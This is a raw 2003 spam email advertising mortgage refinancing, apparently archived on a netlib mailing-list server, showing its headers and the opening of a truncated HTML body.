	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h850mURY029328;
	Thu, 4 Sep 2003 20:48:51 -0400 (EDT)
Received: from [251.250.230.163] by 160.36.58.108 id UyKHMmcQOvf1 for <199902071506.kaa20808@netlib2.cs.utk.edu>; Fri, 05 Sep 2003 09:45:49 -0400
Message-ID: <j$th3n2fo$-n55$vs6@dggi6>
From: "Berta Clement" <312gnao@concentric.com>
Reply-To: "Berta Clement" <312gnao@concentric.com>
To: 199902071506.kaa20808@netlib2.cs.utk.edu
Cc: <anon@netlib2.cs.utk.edu>, <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Refinance now. Don't wait   yqxmvgzuxd
Date: Fri, 05 Sep 03 09:45:49 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="..9CC02_4B4"
X-Priority: 1
X-MSMail-Priority: High


--..9CC02_4B4
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html><head><title>Click Here To Complete The Form MORTGAGE RATES ARE STIL=
L DOWN</title></head><body><table class=3D"MsoNormalTable" style=3D"width:=
 430px; border-collapse: collapse" borderColor=3D"#111111" cellSpacing=3D"=
0" cellPadding=3D"0" border=3D"0"><tr><td style=3D"width: 100=
%; padding: 0in; background: black" bgColor=3D"black"><p style=3D"text-ali=
gn: ce